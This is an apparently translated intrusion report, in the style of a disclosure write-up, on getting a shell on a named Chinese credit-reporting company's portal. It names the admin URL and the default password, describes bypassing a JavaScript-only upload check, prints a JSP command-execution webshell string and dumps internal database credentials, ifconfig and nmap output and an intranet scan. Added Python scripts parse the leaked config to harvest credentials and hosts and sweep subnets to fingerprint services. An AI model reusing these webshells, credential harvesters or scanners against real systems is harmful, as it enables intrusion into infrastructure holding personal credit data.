Getshell (reaching the core intranet segments and the credit-reporting system)
Your company holds one of the eight individual credit-reporting licenses in China. Under the credit-reporting regulations, the license can be revoked after two violations or information leaks.
A credit-reporting institution that runs an individual credit-reporting business must meet the company-formation conditions of the Company Law of the People's Republic of China and the following conditions, and be approved by the State Council's credit-reporting industry supervisory authority:
(1) its main shareholders have a good reputation and no record of major violations of law or regulation in the past three years;
(2) registered capital of not less than RMB 50 million;
(3) facilities, equipment, systems and measures to safeguard information security that meet the requirements of the State Council's credit-reporting industry supervisory authority;
(4) the proposed directors, supervisors and senior managers meet the qualification requirements of Article 8 of these Regulations;
(5) other prudential conditions prescribed by the State Council's credit-reporting industry supervisory authority.
After searching for half a day I finally found the admin backend. Why is there a backend at all? The site could be made static; credit-reporting homepages are basically all like that. The main site:
Http://www.ccxcredit.com.cn/u_l
The password turned out to be admin / 123456 (and I had already run a 100,000-entry dictionary against it, shit, son of a bitch /)
My instinct tells me that on a site like this, the upload function in the admin backend is the way to get a shell.
Found the upload point. The file-type check looks like it is done in JavaScript, so the upload should go through anyway.
Got a shell.
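What "the check is done in JavaScript" means in practice, as an added example (this is not code from the report or from the portal it describes): the browser-side check the report bypasses, what a server that trusts it effectively does, and a server-side check that does not need the browser. File names, sample contents, the allowed-type list and the magic-byte table are constructed for the example; the portal's real upload handler is not shown on the page.

```python
# Added example, not code from the original report or the portal it describes:
# the browser-side check the report bypasses, what a server that trusts it ends
# up doing, and a server-side check that does not need the browser. File names,
# contents and the allowed-type list are constructed for the example.
import os
import re
import uuid
from typing import Optional

ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}
# Leading bytes of the image formats the upload form is meant to accept.
MAGIC = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
# One plain name, one dot, one short extension: nothing else gets through.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})$")


def js_style_check(filename: str) -> bool:
    """The kind of check the portal's JavaScript does: look at the text after the
    last dot. The attacker never runs it; it is here to show what was trusted."""
    return filename.rsplit(".", 1)[-1].lower() in ALLOWED_EXT


def vulnerable_server_store(filename: str, content: bytes) -> Optional[str]:
    """What a server that leaves validation to the browser effectively does: store
    the file under the client-supplied name. A handcrafted POST with
    filename="shell.jsp" therefore lands a JSP under the Tomcat webroot."""
    return filename


def hardened_server_store(filename: str, content: bytes) -> Optional[str]:
    """Server-side check that does not depend on the client. Returns the name the
    file will be stored under, or None when the upload is rejected."""
    # 1. Basename only, plain characters only. This single test rejects path
    #    traversal, NUL bytes, Tomcat ';' path parameters and double extensions.
    name = os.path.basename(filename.replace("\\", "/"))
    m = SAFE_NAME.match(name)
    if not m:
        return None
    ext = m.group(1).lower()
    if ext not in ALLOWED_EXT:
        return None
    # 2. The bytes must start like the image type the extension claims.
    detected = next((t for magic, t in MAGIC.items() if content.startswith(magic)), None)
    if detected is None:
        return None
    if detected == "jpg":
        if ext not in {"jpg", "jpeg"}:
            return None
    elif detected != ext:
        return None
    # 3. Never reuse the client's name. A server-generated name with an image
    #    extension, written to a directory Tomcat does not map to the JSP servlet,
    #    means even a GIF/JSP polyglot that passes step 2 is never executed.
    return f"{uuid.uuid4().hex}.{ext}"


if __name__ == "__main__":
    jsp = b"<% Runtime.getRuntime().exec(request.getParameter(\"c\")); %>"
    print("vulnerable:", vulnerable_server_store("shell.jsp", jsp))   # shell.jsp
    print("hardened:  ", hardened_server_store("shell.jsp", jsp))     # None
    print("hardened:  ", hardened_server_store("photo.jpg", b"\xff\xd8\xff\xe0" + b"\0" * 16))
```

The magic-byte test is the weaker of the two controls: a GIF header followed by JSP source passes it. The control that actually stops the getshell is step 3, since a file that is stored as `<random>.gif` in a directory Tomcat serves statically is never handed to the JSP compiler, whatever its bytes contain.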
Found some intranet information:
#mysql config
db.driver.class=com.mysql.jdbc.Driver
#db.url=jdbc:mysql://localhost:3306/zx_news_db
#db.username=admin
#db.password=admin
db.url=jdbc:mysql://10.1.80.37:3306/zx_news_db?useUnicode=true&characterEncoding=UTF-8
db.username=test
db.password=test
#db.url=jdbc:mysql://10.0.5.152:3306/zx_news_db
#db.username=root
#db.password=123456
#oracle config
#db.driver.class = oracle.jdbc.driver.OracleDriver
#db.url = jdbc:oracle:thin:@10.0.1.40:1521:ccxe
#db.username = pccredit
#db.password = pccredit
#db.schema = PCCREDIT
#org upload file dir
org_file_path = resources/file_uploads
#nh xw score model supply project 1
nh_xw_score_model_supplier = http://10.0.5.152:8080/ccx_credit_nm_20141210
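A config file like this is the most valuable thing on a compromised web server, and the commented-out lines are as interesting as the live ones. The following is an added example, not part of the original report: it parses a Java .properties dump into database records, keeps the commented-out credentials, flags the weak ones, and lists every internal host the file names, which is the starting list for the intranet scan that follows. CONFIG is the dump from the report; the weak-password list and the record layout are my assumptions. The same parser serves a defender running a secret scan over a source tree.

```python
# Added example, not part of the original report: pull database endpoints and
# credentials out of a Java .properties dump like the one above, commented-out
# lines included, and flag the weak ones. CONFIG is the dump from the report;
# the weak-password list and the record layout are my assumptions.
import re

CONFIG = """\
#mysql config
db.driver.class=com.mysql.jdbc.Driver
#db.url=jdbc:mysql://localhost:3306/zx_news_db
#db.username=admin
#db.password=admin
db.url=jdbc:mysql://10.1.80.37:3306/zx_news_db?useUnicode=true&characterEncoding=UTF-8
db.username=test
db.password=test
#db.url=jdbc:mysql://10.0.5.152:3306/zx_news_db
#db.username=root
#db.password=123456
#oracle config
#db.driver.class = oracle.jdbc.driver.OracleDriver
#db.url = jdbc:oracle:thin:@10.0.1.40:1521:ccxe
#db.username = pccredit
#db.password = pccredit
#db.schema = PCCREDIT
#org upload file dir
org_file_path = resources/file_uploads
#nh xw score model supply project 1
nh_xw_score_model_supplier = http://10.0.5.152:8080/ccx_credit_nm_20141210
"""

# key = value, with an optional leading '#': commented-out creds are old creds,
# and old creds are frequently still valid somewhere.
PROP_LINE = re.compile(r"^\s*(#\s*)?([\w.]+)\s*=\s*(.*?)\s*$")
JDBC_MYSQL = re.compile(r"jdbc:mysql://([^:/?]+)(?::(\d+))?/([^?]*)")
JDBC_ORACLE = re.compile(r"jdbc:oracle:thin:@([^:]+):(\d+):(\w+)")
ANY_HOST = re.compile(r"(?:jdbc:mysql://|jdbc:oracle:thin:@|https?://)([A-Za-z0-9.\-]+)")
WEAK_PASSWORDS = {"", "123456", "admin", "test", "root", "password"}  # assumption


def parse_properties(text):
    """Yield (key, value, commented) for every assignment, live or commented out."""
    for raw in text.splitlines():
        m = PROP_LINE.match(raw)
        if m:
            yield m.group(2), m.group(3), bool(m.group(1))


def extract_credentials(text):
    """Group db.url / db.username / db.password triples in file order into records."""
    records = []
    for key, value, commented in parse_properties(text):
        if key == "db.url":
            rec = {"url": value, "commented": commented, "user": None, "password": None,
                   "host": None, "port": None, "db": None}
            m = JDBC_MYSQL.search(value) or JDBC_ORACLE.search(value)
            if m:
                rec.update(host=m.group(1), port=int(m.group(2) or 3306), db=m.group(3))
            records.append(rec)
        elif key == "db.username" and records:
            records[-1]["user"] = value
        elif key == "db.password" and records:
            records[-1]["password"] = value
    for rec in records:
        pw = rec["password"]
        rec["weak"] = pw is None or pw in WEAK_PASSWORDS or pw == rec["user"]
    return records


def internal_hosts(text):
    """Every host named in a JDBC or HTTP URL: the starting list for the intranet scan."""
    return sorted({m.group(1) for m in ANY_HOST.finditer(text)})


if __name__ == "__main__":
    for r in extract_credentials(CONFIG):
        flag = "WEAK" if r["weak"] else "ok"
        state = "commented" if r["commented"] else "live"
        print(f"{flag:4} {state:9} {r['host']}:{r['port']}/{r['db']} {r['user']}:{r['password']}")
    print("hosts:", ", ".join(internal_hosts(CONFIG)))
```

Run against the dump above, all four records come out weak (password equal to the username, or 123456), and the host list already reaches three different /24s (10.1.80.x, 10.0.5.x, 10.0.1.x) plus the Oracle SID of what the property names suggest is the credit database itself.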
[/usr/tips/apache-tomcat-7.0.59/webapps/ccxportal/attached/image/20160127/]$ ifconfig
bond0     Link encap:Ethernet  HWaddr D4:85:64:48:E5:D8
          inet addr:10.1.80.37  Bcast:10.1.80.255  Mask:255.255.255.0
          inet6 addr: fe80::d685:64ff:fe48:e5d8/64 Scope:Link
          UP BROADCAST RUNNING MASTER MULTICAST  MTU:1500  Metric:1
          RX packets:215013915 errors:0 dropped:0 overruns:0 frame:0
          TX packets:105061985 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:19123235861 (17.8 GiB)  TX bytes:112949825904 (105.1 GiB)

eth0      Link encap:Ethernet  HWaddr D4:85:64:48:E5:D8
          UP BROADCAST RUNNING SLAVE MULTICAST  MTU:1500  Metric:1
          RX packets:150213515 errors:0 dropped:0 overruns:0 frame:0
          TX packets:105061984 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:14426070048 (13.4 GiB)  TX bytes:112949825810 (105.1 GiB)
          Interrupt:114 Memory:fb000000-fb7fffff

eth1      Link encap:Ethernet  HWaddr D4:85:64:48:E5:D8
          UP BROADCAST RUNNING SLAVE MULTICAST  MTU:1500  Metric:1
          RX packets:64800400 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:4697165813 (4.3 GiB)  TX bytes:94 (94.0 b)
          Interrupt:122 Memory:fa000000-fa7fffff

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:20860426 errors:0 dropped:0 overruns:0 frame:0
          TX packets:20860426 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:24514978721 (22.8 GiB)  TX bytes:24514978721 (22.8 GiB)
How can a credit-reporting company use a password like this... and a network layout like this...
Credit-reporting systems are supposed to be protected at Classified Protection Level 3. How was that ever passed?
Scanned the network segments:
http://10.1.80.37   > CITIC Credit Co. Ltd.                > Apache-Coyote/1.1                  > Success
http://10.1.80.45   > Insert title here                    > Apache-Coyote/1.1                  > Success
http://10.1.80.21   >                                      > Serv-U/10.5.0.11                   > Success
http://10.1.80.3    > Log In - Juniper Web Device Manager  > Mbedthis-Appweb/2.4.0              > Success
http://10.1.80.2    > Log In - Juniper Web Device Manager  > Mbedthis-Appweb/2.4.0              > Success
http://10.1.80.1    > Log In - Juniper Web Device Manager  > Mbedthis-Appweb/2.4.0              > Success
http://10.0.5.254   > Log In - Juniper Web Device Manager  > Mbedthis-Appweb/2.4.0              > Success
10.1.130.56
http://10.1.130.57  > Phpinfo()                            > Apache/2.2.3 (Red Hat)             > Success
http://10.1.130.55  >                                      > Apache/2.2.6 (Win32) mod_jk/1.2.21 > Success
http://10.1.130.159 > 302 Found                            > Apache                             > Success
http://10.1.130.111 >                                      > Apache                             > Success
http://10.1.130.156 > 302 Found                            > Apache                             > Success
http://10.1.130.112 >                                      > Apache                             > Success
http://10.0.1.22    >                                      > Apache/2.2.12 (Ubuntu)             > Success
http://10.0.1.28    > IIS7                                 > Microsoft-IIS/7.5                  > Success
http://10.0.1.250   > Index                                > Hikvision-Webs                     > Success
http://10.0.1.254   > Log In - Juniper Web Device Manager  > Mbedthis-Appweb/2.4.0              > Success  (APP production network disconnected)
http://10.0.5.254   > Log In - Juniper Web Device Manager  > Mbedthis-Appweb/2.4.0              > Success
The network segments are not isolated from each other. Where is the WAF? IDS? IPS? Firewall? Private network? VDI? Why is there no restriction at all?
[/usr/tips/apache-tomcat-7.0.59/webapps/ccxportal/attached/image/20160127/]$ nmap --iflist

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at CST
************************INTERFACES************************
DEV   (SHORT) IP/MASK        TYPE     UP MAC
lo    (lo)    127.0.0.1/8    loopback up
bond0 (bond0) 10.1.80.37/24  ethernet up D4:85:64:48:E5:D8

**************************ROUTES**************************
DST/MASK       DEV   GATEWAY
10.1.80.0/0    bond0
169.254.0.0/0  bond0
0.0.0.0/0      bond0 10.1.80.1
My God.
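The two steps the report does by hand from the webshell, as an added example that is not part of the original report: first, turn ifconfig output into the subnets the host can reach directly; second, sweep a subnet and classify each HTTP response by status, Server header and <title>, which is the format of the scan listing above. IFCONFIG_SAMPLE is cut from the ifconfig output in the report; the HTTP responses are constructed stand-ins, and the fetch function is injectable so the example runs offline. The 10.0.1.x, 10.0.5.x and 10.1.130.x segments the report also sweeps do not come from ifconfig: they come from hosts named in the config file, reached through the default gateway 10.1.80.1 that nmap --iflist shows.

```python
# Added example, not part of the original report: the two things the report does
# by hand from the webshell. First, turn ifconfig output into the subnets the
# host can reach directly; second, sweep a subnet and classify each HTTP response
# by status, Server header and <title>, the format of the scan listing above.
# IFCONFIG_SAMPLE is cut from the ifconfig output in the report; the HTTP
# responses are constructed and fetch() is injectable so the example runs offline.
import ipaddress
import re
import socket
from html import unescape

IFCONFIG_SAMPLE = """\
bond0     Link encap:Ethernet  HWaddr D4:85:64:48:E5:D8
          inet addr:10.1.80.37  Bcast:10.1.80.255  Mask:255.255.255.0
lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
"""
INET_LINE = re.compile(r"inet addr:(\S+)\s+(?:Bcast:\S+\s+)?Mask:(\S+)")
TITLE = re.compile(rb"<title[^>]*>(.*?)</title>", re.I | re.S)


def subnets_from_ifconfig(text):
    """Non-loopback networks the host sits on, as CIDR strings (dotted masks accepted)."""
    nets = set()
    for ip, mask in INET_LINE.findall(text):
        iface = ipaddress.ip_interface(f"{ip}/{mask}")
        if not iface.ip.is_loopback:
            nets.add(str(iface.network))
    return sorted(nets)


def fingerprint(raw):
    """(status, Server header, <title>) from one raw HTTP response."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    parts = lines[0].split()
    status = parts[1] if len(parts) > 1 else "?"
    server = ""
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "server":
            server = value.strip()
    m = TITLE.search(body)
    title = unescape(m.group(1).decode("utf-8", "replace")).strip() if m else ""
    return status, server, title


def http_probe(host, port=80, timeout=2.0):
    """Live fetch: one GET /, first 64 KiB. Not exercised by the offline test."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(f"GET / HTTP/1.0\r\nHost: {host}\r\n\r\n".encode())
        buf = b""
        while len(buf) < 65536:
            chunk = s.recv(4096)
            if not chunk:
                break
            buf += chunk
    return buf


def scan(network, fetch=http_probe):
    """Sweep every host in the CIDR; hosts that refuse or time out are skipped."""
    results = {}
    for host in ipaddress.ip_network(network).hosts():
        try:
            raw = fetch(str(host))
        except OSError:
            continue
        results[str(host)] = fingerprint(raw)
    return results


# Constructed stand-ins for live hosts, in the shape of the real listing above.
FAKE_RESPONSES = {
    "10.1.80.1": b"HTTP/1.1 200 OK\r\nServer: Mbedthis-Appweb/2.4.0\r\n\r\n"
                 b"<html><head><title>Log In - Juniper Web Device Manager</title></head></html>",
    "10.1.80.37": b"HTTP/1.1 200 OK\r\nServer: Apache-Coyote/1.1\r\n\r\n"
                  b"<html><title>CITIC Credit Co. Ltd.</title></html>",
    "10.1.80.45": b"HTTP/1.1 302 Found\r\nLocation: /login\r\nServer: Apache\r\n\r\n",
}


def fake_fetch(host):
    """Offline fetch: answers only for the constructed hosts, refuses the rest."""
    if host not in FAKE_RESPONSES:
        raise ConnectionRefusedError(host)
    return FAKE_RESPONSES[host]


if __name__ == "__main__":
    for net in subnets_from_ifconfig(IFCONFIG_SAMPLE):
        for host, (status, server, title) in scan(net, fake_fetch).items():
            print(f"http://{host} > {title} > {server} > {status}")
```

The same sweep is the check the defender should have run from this host: a Server-header inventory taken from the public web server's own subnet is what shows that Juniper and Hikvision management interfaces and an Oracle segment are reachable from a box that serves the internet.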
Solution:
You hold data on the entire Chinese population. A leak like this is grounds for revoking the license. Was it easy to win that license after all those hardships? Have you forgotten XX?